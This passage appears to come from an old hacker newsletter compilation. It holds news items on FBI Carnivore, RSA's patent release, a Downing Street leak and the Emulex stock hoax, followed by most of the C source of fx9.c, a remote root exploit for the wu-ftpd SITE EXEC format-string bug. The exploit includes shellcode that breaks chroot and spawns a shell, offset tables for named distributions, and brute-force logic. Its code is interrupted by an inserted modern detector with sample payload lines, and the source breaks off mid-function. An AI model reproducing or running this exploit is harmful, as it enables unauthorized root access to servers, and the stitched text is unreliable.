      and coordination facility for a worldwide system of sensors designed to provide an accurate picture of US and
      Canadian airspace. Like NORAD, NOCpulse serves and protects its customers through superior information used
      to watch, respond and protect their Internet infrastructure.
    
    
      Management

      Executive
      Paul Santinelli, President and Founder
      Steve Springsteel, Chief Financial Officer
      Jon Prall, Sr. VP, Technology
      Dan Nater, VP, Operations
      Jim Gerber, VP, Sales
      Dave Parker, Principal Engineer

      Board of Directors
      Paul Santinelli, President and Founder
      David Sze, General Partner, Greylock
      Angelo Santinelli, General Partner, North Bridge Venture Partners

      Board Observers
      David Strohm, General Partner, Greylock
      Richard D'Amore, General Partner, North Bridge Venture Partners

      Funding
      Series A, April 2000: $12 Million, Greylock and North Bridge Venture Partners

      Contact Info:
      NOCpulse, Inc.
      1293 Mountain View Alviso Road, Suite D
      Sunnyvale, CA 94089
      (408) 542-2800
      www.nocpulse.com
      info@nocpulse.com               
      
      
344.0 [IND] Oct 2000: Carnivore does more than previously thought
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 

      http://www.theregister.co.uk/content/1/13767.html
      
      Carnivore does more than previously thought
      By: Thomas C Greene in Washington Posted: 05/10/2000 at 14:49 GMT

      
      Heavily censored FBI documents obtained by US watchdog outfit the 
      Electronic Privacy Information Centre (EPIC), under a Freedom of 
      Information Act (FOIA) lawsuit, indicate that the FBI's electronic snoop 
      known as Carnivore might be able to monitor a good deal more than just 
      e-mail traffic. 

      Among the capabilities that peek out from behind all the indelible black 
      swaths in the documents is an ability to reconstruct an entire Web page as 
      viewed by a subject. A planned, updated version may even be able to 
      capture voice-over-Web communications. Presently the system can capture 
      and record all packet traffic to and from a selected IP, while monitoring 
      a subject's on-line movements. 

      These extra capabilities underscore the controversial issue of FBI 
      reliability in restraining itself when authorised to view only e-mail 
      headers. This is a crucial point, because the Bureau can obtain the 
      on-line equivalent of a pen register order (recording the destinations of 
      out-going communications) or a trap and trace order (recording the origins 
      of in-coming communications) without a warrant signed by a judge. Because 
      of the lower standard, the contents of such communications must not be 
      intercepted. 

      For such limited surveillance the standard of evidence is quite low: the 
      FBI need merely be prepared to prove that the information sought could be 
      material to an investigation. To snoop on the actual content communicated 
      - the on-line equivalent of a telephone wiretap - the FBI must satisfy a 
      judge that a crime is likely to be committed. 

      Some judges hand out wiretap orders as if they were parking tickets; 
      others will laugh one out of chambers for producing less than a smoking 
      gun in evidence. The system is far from perfect, but on balance it does a 
      tolerable job of keeping most of the Feds at an appropriate distance most 
      of the time. 

      But many fear that the FBI could broaden its on-line snooping under 
      limited surveillance orders, succumbing to temptation provided by 
      Carnivore's additional capabilities. Suppose, for example, that FBI agents 
      were to obtain a pen register and/or trap and trace order for a subject, 
      but then go a bit further on their own. Would anyone be the wiser? 

      And what becomes of information collected illegally? It's useless in 
      court, being the poisonous fruit of a forbidden tree. But suppose it were 
      sufficient to tip off the Feds to a criminal act for which they could 
      later obtain evidence legitimately. 

      They wouldn't have known about it if they hadn't broken the law, but 
      they'll build a case in court based on evidence gathered legitimately. 
      Would anyone be the wiser? 

      One possible solution to these concerns would be for the FBI to develop a 
      bare-bones version of Carnivore, capable of intercepting nothing more than 
      e-mail headers, to be used for the on-line equivalent of trap and trace 
      and pen register orders. 

      Thus the full-scale Carnivore with its additional capabilities would be 
      authorised for use only when a wiretap order had been issued by a judge. 
      This wouldn't be a guarantee against abuse of limited snooping authority, 
      but it would add an extra layer of protection for subjects, and a bit more 
      credibility to FBI claims of conscientious self-regulation. Abuse would 
      require a wider circle of cooperation, and so increase the likelihood that 
      an overzealous agent would be caught with his hand in the cookie jar by a 
      supervisor.  

      @HWA
      
345.0 [IND] Surprise! RSA releases crypto patent ahead of schedule
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      http://www.zdnet.com/eweek/stories/general/0,11011,2624678,00.html
      
      Surprise! RSA releases crypto patent ahead of schedule

      By Scott Berinato, eWEEK September 6, 2000 11:19 AM ET

      
      RSA Security Inc. today pulled the tablecloth from underneath its 
      competitors' plates, releasing its cryptographic algorithm into the public 
      domain two weeks early. 

      The patent on RSA's crypto technology, which is widely employed in the 
      security realm, would have expired September 20, exactly 17 years after 
      the patent was issued to the Massachusetts Institute of Technology and 
      licensed exclusively to RSA. The 20th has been widely considered a 
      watershed date, circled on many security company executives' 
      calendars. Some companies, like Baltimore Technologies Inc., 
      were using the expiration of the patent as a springboard for new products 
      and marketing campaigns. 

      RSA CEO Art Coviello told eWEEK that the company wanted to get this 
      milestone out of the way because it was garnering too much attention and 
      confusing customers. 

      "Someone asked me if I had thought about extending the patent, and that's 
      the thing," Coviello said. "The idea of extending the patent hadn't even 
      occurred to us because it's just not part of our business. Why would we 
      not want this to be the de facto standard in the public domain? So now 
      it's out there." 

      Coviello also said that the expiration of patent number 4,405,829 hasn't 
      affected the company's strategic direction, which appears to remain 
      focused on technology. While other companies are hurriedly extending into 
      managed security services, RSA wants to remain a company entrenched in 
      code. 

      "We're not schizophrenic," Coviello said. "We know who we are. We won't 
      try to be something we're not. I don't think you can execute on a managed 
      services model and a product model at the same time." 

      @HWA
      

346.0 [IND] Hackers: The millennial scapegoats?
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      http://www.theregister.co.uk/content/6/12010.html?&_ref=233393570
      
      Hackers: The millennial scapegoats?
      By: Kieren McCarthy
      Posted: 18/07/2000 at 15:59 GMT

      The leak of a confidential memo outlining PM Tony Blair's concerns
      that New Labour is out of touch with the electorate appears to have
      been pinned on hackers. 

      The leak came as an embarrassment to the government, especially
      considering recent criticism of its policies. After the memo came to
      light, papers were quick to point out the significance of it only being
      sent to close confidants of the prime minister. Who is the mole?,
      was the question posed by many editorials. 

      However, after a day's reflection, a different explanation from the
      traditional frustrated-minister-leak has taken hold. Number 10, the
      theory holds, has been hacked and this explains not only this leak
      but other embarrassing revelations that have come out in recent
      months. 

      This is an extremely tough call to make. On the one hand, this
      explanation is a near-perfect political answer to a nasty situation. On
      the other, it's all too plausible. 

      Faced with the situation, and assuming it was a leak by a senior
      government source, this hacker theory has enormous political
      advantages. It is already in the public domain, so damage limitation
      is the order of the day. The hacker story will pull media attention off
      its search for who leaked the material and push it towards computer
      security concerns. Aside from lifting scrutiny and pressure on the
      party, it also produces a smokescreen behind which Labourites can
      try to find who actually released the information. 

      Building on the idea that it has been hacked will also provide the
      government with a certain degree of sympathy - most people have
      had their privacy invaded at some point and know that reality is often
      very different from the perceived truth. On top of this, this whole
      situation elevates the issue of computer security and thus Internet
      technology and the digital world. It's what's called making the best of
      what you've got. 

      But then, of course, it may be a hack job. Whitehall has been
      pushing through some fairly hefty IT projects recently in its bid to
      make the government totally Internet-enabled by 2005. When things
      go this fast, it only needs one civil servant with an astute IT
      knowledge to find a hole in the system. Once that hole is found, and
      with people rushing ahead with other projects, it is not inconceivable
      that you could gain and fortify a foothold in the government's IT
      system. A very useful foothold to have. The recent defacing of the
      Cabinet Office Web site also points to the fact that Downing Street
      has been targeted by hackers. 

      "Senior sources" have also pointed out that recent leaks have had
      one thing in common: they have been sent via email. What's the truth
      of this? Well, we would apply the if-it-sounds-too-perfect-it-ain't-true
      rule. In this case, we don't believe a word of it. 

      Getting cynical for a moment, it is not even inconceivable that this is
      an intentional leak. If you look at it, the memo basically says that
      Tony Blair actually has his finger on the UK's pulse by, er... not
      having his finger on the pulse. He is seen to be answering the press'
      concerns, he is concerned about the British public blah blah blah. 

      So what is actually going on? We really couldn't tell you. But
      whatever story you believe, it does demonstrate one thing: that the
      government has become far more tech-savvy than at any time in the
      past. As ever, this will have negative and positive effects on the
      UK's democracy. 

      @HWA
      
347.0 [IND] Student Arrested in Emulex Hoax Case
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      http://www.zdtv.com/zdtv/zdtvnews/politicsandlaw/story/0,3685,9239,00.html
      
      Student Arrested in Emulex Hoax Case           
      By Maria Godoy, TechTV News 
      August 31, 2000 
      
      
      FBI officials today arrested a 23-year-old Southern California student in 
      connection with a fake press release that triggered a 50 percent plunge 
      last Friday in the stock price of technology company Emulex. 

      
      Mark Simeon Jakob, a resident of El Segundo, California, was taken to a 
      Los Angeles County courthouse around 11 a.m. Pacific Thursday and charged 
      with multiple felonies, including wire fraud, acting with intent to 
      defraud, participating in a scheme to defraud, and securities fraud. 
      
      He faces a maximum penalty of 15 years in prison. 
      
      Until August 18, Jakob had been an employee of Internet Newswire, the 
      Web-based corporate news service that distributed the bogus press release, 
      and he knew how to navigate its system to get a hoax release through, 
      authorities said. 
      
      "The suspect, we believe, realized about a quarter of a million dollars in 
      profits from trades he made around the time of the fake press release," 
      Mrozek said. 
      
      The fake Emulex press release said the company was restating its earnings, 
      was under investigation by the Securities and Exchange Commission, and 
      that its chief executive had quit. 
      
      FBI agents traced the bogus release to an email sent last Thursday night 
      from a computer in the library of El Camino Community College, where Jakob 
      is a student. Thom Mrozek, a spokesman for the US attorney's office in Los 
      Angeles, said Jakob was seen using a PC in the school library that night. 
      
      Last Friday, investors reacting to the hoax release began frantically 
      selling off shares in Emulex, which lost about $2.5 billion in value in a 
      matter of hours. 
      
      After Nasdaq halted trading in the stock, and the company said the information
      was false, shares recovered nearly all the losses.       
      
      Short-selling scam gone wrong       
      
      According to authorities, Jakob staged the press release hoax in order to 
      avoid heavy losses from a short-selling scam gone wrong.       

      Investors who sell stock "short" borrow shares from a financial 
      institution, betting that the price will fall at some future date. The 
      shares are later replaced at a lower price, and the trader pockets the 
      difference.       

      Jakob allegedly shorted more than 3,000 Emulex shares two weeks ago, 
      selling them at between $72 and $92 a share. However, Emulex share prices 
      did not drop as Jakob had expected, climbing instead to more than $100 by 
      late last week.       

      To avoid potentially steep losses, Jakob manipulated the stock price to 
      plummet. He replaced his borrowed shares at the lower price, reaping a 
      profit of more than $50,000.       

      As Emulex stock continued to plunge, Jakob bought up more shares, selling 
      them three days after the stock price had recovered for a $186,000 profit.       

      This is not the first time a fake press release has been used to influence 
      a company's stock. In 1999, Gary Hoke of North Carolina was fined $93,000 
      and sentenced to five years' probation after he falsely reported that 
      PairGain Technologies was about to be sold to an Israeli company.
      
      @HWA
      
348.0 [EXP] fx9.c WuFTPD < 2.6.1 exploit
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      /*
       * THIS IS PRIVATE!! DO NOT DISTRIBUTE!! VERY MUCH PRIVATE!!
       *
       * fx - BETA9 - WU-FTPD REMOTE ROOT EXPLOIT
       * Exploits the format bug on the call SITE EXEC in wu-ftpd < 2.6.1
       *
       * Greets to: All spanish coders in the dark :) 
       *
       * The Dark Raver <doble@iname.com>
       * (23/08/2000 - Spain) 
       *
       * Tired of trying other wu-ftpd exploits and they dont work??
       * Tired of waiting for very slow ways of exploiting??
       * Tired of using exact offsets that never works??
       *
       * This is your exploit!!!! It tests differents aligns, lengths, sizes 
       * and offsets until it found the shell.
       * 
       * Usage: fx9 <host> [offset] [eat] [align] [address] [-d] [-f]
       * [offset] -> The position of the stack where is stored some eip
       * [eat] -> The number of %.f used
       * [address] -> The address in memory of our shellcode, can be stack or heap
       * [-d] -> Use debug, more output and control over the calculation process
       * [-f] -> Force values, dont test if values are correct 
       *
       * The code sucks, but work 90% of times on 90% of vulnerable wu-ftpd for 
       * linux. Just play with the values.
       *
       * Example:				Offset		Ret		Eat-Align
       * SuSe 6.3 wuftpd.rpm 2.6.0-20		0xbfffae68	0xbffffd9b	137-2
       * RedHat 6.2 wu-ftpd-2.6.0-3.i386.rpm 	0xbfffd074	0xbfffdd14	137-2
       * RedHat 6.2 wu-ftpd-2.6.0-3.i386.rpm 	0xbfffae68	0xbffffd9b	137-2	
       * SuSe 6.3 wuftpd.rpm 2.6.0-20		0xbfffce94	0xbfffd6d4	137-2
       * Caldera 1.1 wu-2.4.2-academ[BETA-15](1) 0xbfffec14	0xbffffee0	5-2
       * SuSe 5.1 wuftpd-2.4.2beta15-5	0xbfffeafc	0xbffffdf8	5-2
       * ?? wu-2.4(1)				0x????????	0x????????	5-6
       * ?? wu-2.4(4)				0xbffff0dc	0xbffffe14	5-2 
       * RedHat 5.0 wu-ftpd-2.4.2b15-5	0xbfffef28	0xbffffdf4	5-2
       * RedHat 6.2 wu-ftpd-2.6.0-3.i386.rpm	0xbfffae68	0x8075a10	137-2
       * RedHat 6.2 wu-ftpd-2.6.0-3.i386.rpm	0xbfffae68	0x8076cb0	137-2
       *
       *
       * !!NOTE!! Dont use offsets with the chars 0x00 (dont be lamer! ;)
       *
       * !!NOTE!! wu-ftpd converts to lowercase so most 0x41-0x5A will be converted 
       * to another values.
       * 
       * !!NOTE!! The shellcode and some strings printed in the screen can corrupt
       * your terminal simply ^Z, reset and fg.
       *
       * For Omnis, the best and the impossible:
       *
       *  "Today the earth and the heavens smile on me,
       *   Today the sun reaches the depths of my soul,
       *   Today I have seen her... I have seen her and she has looked at me...
       *   Today I believe in God!"
       *
       */
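
Added defensive example (not part of fx9.c or of the wu-ftpd source): the header above describes requests that carry printf directives (%.f, %x, %n) in the SITE EXEC argument. The code below flags such control-channel lines and shows the hardened reply call, where client text is passed as data under a fixed "%s" format. The function names, the threshold and the sample lines are assumptions constructed for illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <strings.h>

/* Verdicts returned by classify_ftp_command() (names are this example's own). */
enum { FTP_OK = 0, FTP_SUSPICIOUS = 1, FTP_CRITICAL = 2 };

/* Assumed cut-off: this many directives in one command is not a file name. */
#define DIRECTIVE_THRESHOLD 8

/*
 * Count printf-style conversion directives in s. "%%" is a literal percent
 * sign and is not counted. *writes is set to 1 when a %n directive (the only
 * conversion that stores to memory) is present, otherwise to 0.
 */
int count_directives(const char *s, int *writes)
{
    int count = 0;

    *writes = 0;
    while (*s) {
        if (*s++ != '%')
            continue;
        if (*s == '%') { s++; continue; }                     /* escaped percent */
        while (*s && strchr("-+ #0", *s)) s++;                /* flags */
        while (isdigit((unsigned char)*s) || *s == '*') s++;  /* width */
        if (*s == '.') {                                      /* precision */
            s++;
            while (isdigit((unsigned char)*s) || *s == '*') s++;
        }
        while (*s && strchr("hlLqjzt", *s)) s++;              /* length modifiers */
        if (*s && strchr("diouxXeEfgGcspn", *s)) {            /* conversion */
            count++;
            if (*s == 'n')
                *writes = 1;
            s++;
        }
    }
    return count;
}

/*
 * Classify one FTP control-channel line. Only SITE EXEC is inspected, so a
 * file name such as "report%20final.txt" in RETR does not raise an alert.
 */
int classify_ftp_command(const char *line)
{
    static const char verb[] = "site exec";
    int writes, n;

    while (*line == ' ' || *line == '\t')
        line++;
    if (strncasecmp(line, verb, sizeof verb - 1) != 0)
        return FTP_OK;
    n = count_directives(line + sizeof verb - 1, &writes);
    if (writes || n >= DIRECTIVE_THRESHOLD)
        return FTP_CRITICAL;
    return n > 0 ? FTP_SUSPICIOUS : FTP_OK;
}

/*
 * Hardened reply path: the format string is a constant and the client text is
 * a data argument. The bug class is the same call with client_text in the
 * format position, i.e. snprintf(out, outlen, client_text).
 */
int format_reply(char *out, size_t outlen, const char *client_text)
{
    return snprintf(out, outlen, "200-%s\r\n", client_text);
}

int main(void)
{
    /* Constructed control-channel lines, not captured traffic. */
    static const char *samples[] = {
        "SITE EXEC ls -l",
        "RETR report%20final.txt",
        "site exec 0000%.f%.f%.f|%x",
        "site exec 0000%.f%.f%.300d%n",
    };
    static const char *label[] = { "ok", "suspicious", "critical" };
    char reply[128];
    size_t i;

    for (i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        format_reply(reply, sizeof reply, samples[i]);
        printf("%-10s %s", label[classify_ftp_command(samples[i])], reply);
    }
    return 0;
}
```

With the fixed format the directives come back to the client as literal text, so the server never interprets them.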
      
      #include <stdio.h>
      #include <string.h>
      #include <stdarg.h>
      #include <string.h>
      #include <sys/types.h>
      #include <sys/socket.h>
      #include <netinet/in.h>
      #include <netdb.h>
      #include <unistd.h>
      #include <arpa/inet.h>
      #include <sys/errno.h>
      #include <sys/types.h>
      #include <sys/select.h>
      
      int debug=0; // change this if you want output
      int force=1;
      
      #define EAT 137
      #define TOEIP 0xbfffae68 
      #define ALIN 2
      #define RETN 0xbffffd9b
      #define BUFLEN 1024
      #define BIGBUF 10000
      #define INICIO 0x245
      
      void conectar(char *host);
      void term(void);
      void mkcode1(void);
      void mkbuf(void);
      void mkini(void);
      void mkalin(void);
      void mksh(void);
      void status(void);
      
      char code1[40];
      
      // nops + suid + break chroot + sh
      char code2[]=
      "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
      "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
      "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
      "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
      "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
      "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
      "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x4f\x31\xc0\x31\xc9\x5e\x88"
      "\x46\x07\xb0\x27\x8d\x5e\x05\xfe\xc5\xb1\xed\xcd\x80\x31\xc0\x8d"
      "\x5e\x05\xb0\x3d\xcd\x80\x31\xc0\xbb\xd2\xd1\xd0\xff\xff\xf7\xdb"
      "\x31\xc9\xb1\x10\x56\x01\xce\x89\x1e\x83\xc6\x03\xe0\xf9\x5e\xb0"
      "\x3d\x8d\x5e\x10\xcd\x80\x31\xc0\x89\x76\x08\x89\x46\x0c\xb0\x0b"
      "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xac\xff\xff\xff\xff"
      "\xff\xff/bin/sh";
      
      char code3[8];
      
      // Global variables rulez!!! ;)
      
      int alin=ALIN;
      int eat=EAT;
      unsigned int toeip=TOEIP;
      unsigned int retn=RETN;
      char buf[BUFLEN];
      int inicio=INICIO;
      int opt=1;
      
      int sock;
      struct sockaddr_in sa;
      struct hostent *hp;
      
      int main(int argc, char *argv[]) {
      char mbuf[BIGBUF];
      int c;
      char *str;
                                                          
      while ((c = getopt(argc,argv,"df"))!= -1){
      	switch (c) {
      		case 'd':
      			printf("Debug active\n");
      			debug=1;
      			break;
      		case 'f':
      			printf("Forcing values\n");
      			force=0;
      			break;
      		}
      	}
      	
      argc -= optind;
      argv += optind;
      
      //printf("%i\n", argc);
      
      if(argc!=5) {
      	fprintf(stderr,"Usage: fx <host> [offset] [eat] [align] [address] [-d] [-f]\n");
          	if(argc==1) {
          	printf("Using default values: offset=%x eat=%i align=%i add=%x\n",
          	toeip, eat, alin, retn);
          	} else {
          	exit(0); }
          	}
         
      printf("1. Connecting...\n");
      
      if(debug) getchar();
      
      conectar(argv[0]);
      
      printf("2. Calculating eat...\n");
      
      if(debug) getchar();
      
      if(argc>=3) { sscanf(argv[2], "%i", &eat); }
              else { eat=EAT; }
      
      // The real spaghetti coding!!! ;)
      
      if(force) {
      eat--;
              
      do {
      eat++;
      memset(code1,0x30,40);
      
      mkalin();
      
      send(sock,buf,strlen(buf),0);
      
      c=recv(sock, mbuf, sizeof(mbuf), 0);
      if(debug) puts(mbuf);
      str=strchr(mbuf,'|');
      if(str==0) {
      	printf("Unable to complete search!\n");
      	exit(-1); }
      str[9]='\x00';
      
      printf("Using eat: %i\n", eat);
      printf("<%s>\n\n",str);
      
      if(!(strncmp(str,"|30303030",9))) {
      	opt=0; }
      
      memset(mbuf, 0, BIGBUF);
      
      c=recv(sock, mbuf, sizeof(mbuf), 0);
      if(debug) puts(mbuf);
      memset(mbuf, 0, BIGBUF);
      
      if(debug) getchar();
      
      } while(opt);
      
      opt=1;
      }
      printf("Eat OK: %i\n", eat);
      
      printf("3. Calculating align...\n");
      
      if(debug) getchar();
      
      if(argc>=4) { sscanf(argv[3], "%i", &alin); }
              else { alin=ALIN; }
      
      if(force) {
      alin--;        
      
      do {
      alin++;
      
      toeip=0x31313131;
      
      mkcode1();
      
      mkalin();
      
      send(sock,buf,strlen(buf),0);
      
      c=recv(sock, mbuf, sizeof(mbuf), 0);
      if(debug) puts(mbuf);
      str=strchr(mbuf,'|');
      if(str==0) {
              printf("Unable to complete search!\n");
              exit(-1); }
      str[9]='\x00';
      
      printf("Using align: %i\n", alin);
      printf("<%s>\n\n",str);
      
      if(!(strncmp(str,"|31313131",9))) {
      	opt=0; }
      
      memset(mbuf, 0, BIGBUF);
      
      c=recv(sock, mbuf, sizeof(mbuf), 0);
      if(debug) puts(mbuf);
      memset(mbuf, 0, BIGBUF);
      
      if(debug) getchar();
      
      } while(opt);
      
      opt=1;
      
      toeip=TOEIP;
      }
      printf("Align OK: %i\n", alin);
      
      printf("4. Calculating inital length...\n");
      
      if(debug) getchar();
      
      if(argc>=2) { sscanf(argv[1], "%x", &toeip); }
      	else { toeip=TOEIP; }
      
      if(force) {
      mkcode1();
      
      mkini();  
         
      send(sock,buf,strlen(buf),0);
      
      c=recv(sock, mbuf, sizeof(mbuf), 0);
      if(debug) puts(mbuf);
      str=strchr(mbuf,'|');
      if(str==0) {
              printf("Unable to complete search!\n");
              exit(-1); }
      inicio=str - mbuf - 4;
      memset(mbuf, 0, BIGBUF);
      
      c=recv(sock, mbuf, sizeof(mbuf), 0);
      if(debug) puts(mbuf);
      memset(mbuf, 0, BIGBUF);
      
      if(debug) getchar();
      }
      printf("Start OK: %x\n", inicio);
      
      // It search in the remote memory!! wow!! :)
      
      printf("5. Searching for shellcode\n");
      
      if(debug) getchar();
      
      if(argc>=5) { sscanf(argv[4], "%x", &retn); }
              else { retn=RETN; }
      
      if(force) {
      retn-=0x40;
              
      do {
      retn+=0x40;
      
      toeip=retn;
      
      mkcode1();
      
      mksh();
      
      send(sock,buf,strlen(buf),0);
      
      c=recv(sock, mbuf, sizeof(mbuf), 0);
      if(debug) puts(mbuf);
      str=strchr(mbuf,'|');
      if(str==0) {
      	printf("Unable to complete search!\n");
      	exit(-1); }
      str[5]='\x00';
      
      printf("Using ret: %x\n", retn);
      printf("<%s>\n\n",str);
      
      if(!(strncmp(str,"|AAAA",5))) {
      	opt=0; }
      
      memset(mbuf, 0, BIGBUF);
      
      c=recv(sock, mbuf, sizeof(mbuf), 0);
      if(debug) puts(mbuf);
      memset(mbuf, 0, BIGBUF);
      
      if(debug) getchar();
      
      } while(opt);
      
      opt=1;
      }
      printf("Address of the shellcode OK: %x\n", retn);
      
      printf("6. Sending attack...\n");
      
      if(argc>=2) { sscanf(argv[1], "%x", &toeip); }
       	else { toeip=TOEIP; }
      
      status();
      
      if(debug) getchar();
      
      do {
      printf("Using Offset: %x\n", toeip);
      
      mkcode1();
      
      mkbuf();
      
      send(sock,buf,strlen(buf),0);
      
      printf("Waiting for shell...\n\n");
      
      term();
      
      printf("Logged out...\n");
      
      if(debug) getchar();
      
      printf("Reconecting...\n");
      
      if(debug) getchar();
      close(sock);
      fflush(stdout);
      conectar(argv[0]);
      
      } while(opt);
      
      printf("Ending...");
      if(debug) getchar();
      close(sock);
      fflush(stdout);
      exit(0);
      }
      
      void conectar(char *host) {
      char cbuf[BUFLEN];
      int c;
      
      memset(cbuf, 0, BUFLEN);
      
      if((hp=(struct hostent *)gethostbyname(host))==NULL) {
      	perror("gethostbyname()");
      	exit(0); }
      
      if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
              perror("socket()");
              exit(0); }
      
      sa.sin_family=AF_INET;
      sa.sin_port=htons(21);
      
      memcpy((char *)&sa.sin_addr,(char *)hp->h_addr,hp->h_length);
      
      if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))!=0) {
      	perror("connect()");
              exit(0); }
      
      printf("Connected to %s\n",host);
      
      printf("Reading...\n");
      
      c=recv(sock, cbuf, sizeof(cbuf), 0);  
      if(debug) puts(cbuf);
        
      if((strncmp(cbuf, "220 ", 4))==0) { memset(cbuf, 0, BUFLEN); }
      	else {
      	if((strncmp(cbuf, "220-", 4))==0) {
      		memset(cbuf, 0, BUFLEN);
      		c=recv(sock, cbuf, sizeof(cbuf), 0);
      		if(debug) puts(cbuf);
      		memset(cbuf, 0, BUFLEN); }
      	else {	 
      		printf("Wrong ftp server\n");
      		exit(-1); }
      	}                                                          
      
        	                        
      printf(">> user ftp\n");
      sprintf(cbuf,"user ftp\n");
      write(sock,cbuf,strlen(cbuf));
        
      c=recv(sock, cbuf, sizeof(cbuf), 0);
      if(debug) puts(cbuf);
        
      if(strncmp(cbuf, "331", 3)) {
      	printf("Anonymous ftp not allowed\n");
      	exit(-1);
      	}                                                         
      
      memset(cbuf, 0, BUFLEN);
        
      printf(">> pass %s@mail.com\n", code2);
      sprintf(cbuf,"pass %s@mail.com\n", code2);
      write(sock,cbuf,strlen(cbuf));
      
      c=recv(sock, cbuf, sizeof(cbuf), 0);
      if(debug) puts(cbuf);
        
      if((strncmp(cbuf, "230 ", 4))==0) { memset(cbuf, 0, BUFLEN); }
      	else {
      	if((strncmp(cbuf, "230-", 4))==0) {
      		memset(cbuf, 0, BUFLEN);
      		c=recv(sock, cbuf, sizeof(cbuf), 0);
      		if(debug) puts(cbuf);
      		memset(cbuf, 0, BUFLEN); }
      	else {	 
      		printf("Wrong password\n");
      		exit(-1); }
      	}     
      	  
      printf("Logged\n");
      
      }
      
      void term(void) {
      char sbuf[BUFLEN];
      fd_set rfds;
      int x;
      
      sprintf(sbuf, "QUIT\nuname -a; id;\n");
      send(sock, sbuf, strlen(sbuf), 0);                
      
      while (1) {
            FD_ZERO(&rfds);
            FD_SET(0, &rfds);
            FD_SET(sock, &rfds);
            
            if(select((0 > sock ? 0 : sock) + 1, &rfds, NULL, NULL, NULL) < 1)
      	return;
            
            if(FD_ISSET(sock, &rfds)) {
      	  if((x = read(sock, sbuf, sizeof(sbuf))) < 1)
      	    return;
      	    write(0, sbuf, x);	}
      
            if(FD_ISSET(0, &rfds)) {
      	  if((x = read(0, sbuf, sizeof(sbuf))) < 1)
      	    return;
      	    write(sock, sbuf, x); }
            }
      
      }
      
      void mkcode1(void) {
      int i;
      int c;
      
      memset(code1,0x30,40);
      
      i=alin;
      
      for(c=0;c<4;c++) {
      
        code1[i]=(toeip & 0xff);
        if(code1[i]=='\xff') {
        	i++;
        	code1[i]=(toeip & 0xff); }
        i++;
        code1[i]=((toeip & 0xff00) >> 8);
        if(code1[i]=='\xff') {
              i++;
              code1[i]=((toeip & 0xff00) >> 8); }                  
        i++;
        code1[i]=((toeip & 0xff0000) >> 16);
        if(code1[i]=='\xff') {
        	i++;
        	code1[i]=((toeip & 0xff0000) >> 16); }
        i++;
        code1[i]=((toeip & 0xff000000) >> 24);
        if(code1[i]=='\xff') {
        	i++;
        	code1[i]=((toeip & 0xff000000) >> 24); }
      
        i=i+5;
        toeip++;
      
      }
      
      i=i-4;
      code1[i]='\x00';
      
      }
      
      void mkbuf(void) {
      char *ptr = buf;
      int r1, r2, r3, r4;
      int i;
      
      memset(buf, 0, 1024);
        
      ptr = &buf[strlen(buf)];
      
      sprintf(ptr, "site exec ");
      ptr = &buf[strlen(buf)];
      
      for(i=0; i < strlen(code1);i++) {
      	sprintf(ptr,"%c", code1[i]);
      	ptr = &buf[strlen(buf)]; }
              
      for(i=0; i < eat; i++) {
      	sprintf(ptr, "%%.f");
          	ptr = &buf[strlen(buf)]; }  
      
      r1 = (retn & 0xff);
      r1 |= ((inicio & 0xff00) + 0x100);
      sprintf(ptr,"%%.%dd", r1 - inicio);
      ptr = &buf[strlen(buf)];
      sprintf(ptr,"%%n"); 
      ptr = &buf[strlen(buf)];
      
      r2 = (retn & 0xff00) >> 8;
      r2 |= ((inicio & 0xff00) + 0x200);
      sprintf(ptr,"%%.%dd", r2 - r1);
      ptr = &buf[strlen(buf)];
      sprintf(ptr,"%%n");
      ptr = &buf[strlen(buf)];
      
      r3 = (retn & 0xff0000) >> 16;
      r3 |= ((inicio & 0xff00) + 0x300);
      sprintf(ptr,"%%.%dd", r3 - r2);
      ptr = &buf[strlen(buf)];
      sprintf(ptr,"%%n"); 
      ptr = &buf[strlen(buf)];
      
      r4 = (retn & 0xff000000) >> 24;
      r4 |= ((inicio & 0xff00) + 0x400);
      sprintf(ptr,"%%.%dd", r4 - r3);
      ptr = &buf[strlen(buf)];
      sprintf(ptr,"%%n"); 
      ptr = &buf[strlen(buf)];
      
      sprintf(ptr,"%s",code3);
      ptr = &buf[strlen(buf)];
      
      sprintf(ptr,"\n");
      
      }
      
      void mkini(void) {
      char *ptr = buf;
      int i;
      
      memset(buf, 0, 1024);
        
      ptr = &buf[strlen(buf)];
      
      sprintf(ptr, "site exec ");
      ptr = &buf[strlen(buf)];
      
      for(i=0; i < strlen(code1);i++) {
      	sprintf(ptr,"%c", code1[i]);
      	ptr = &buf[strlen(buf)]; }
              
      for(i=0; i < eat; i++) {
      	sprintf(ptr, "%%.f");
          	ptr = &buf[strlen(buf)]; }  
      
      sprintf(ptr,"|");
      ptr = &buf[strlen(buf)];
      
      sprintf(ptr,"%%x-");
      ptr = &buf[strlen(buf)]; 
      	
      sprintf(ptr,"%%x"); 
      ptr = &buf[strlen(buf)];
      
      sprintf(ptr,"\n");
      
      }
      
      void mkalin() {
      char *ptr = buf;
      int i;
      
      memset(buf, 0, 1024);
        
      ptr = &buf[strlen(buf)];
      
      sprintf(ptr, "site exec ");
      ptr = &buf[strlen(buf)];
      
      for(i=0; i < strlen(code1);i++) {
      	sprintf(ptr,"%c", code1[i]);
      	ptr = &buf[strlen(buf)]; }
              
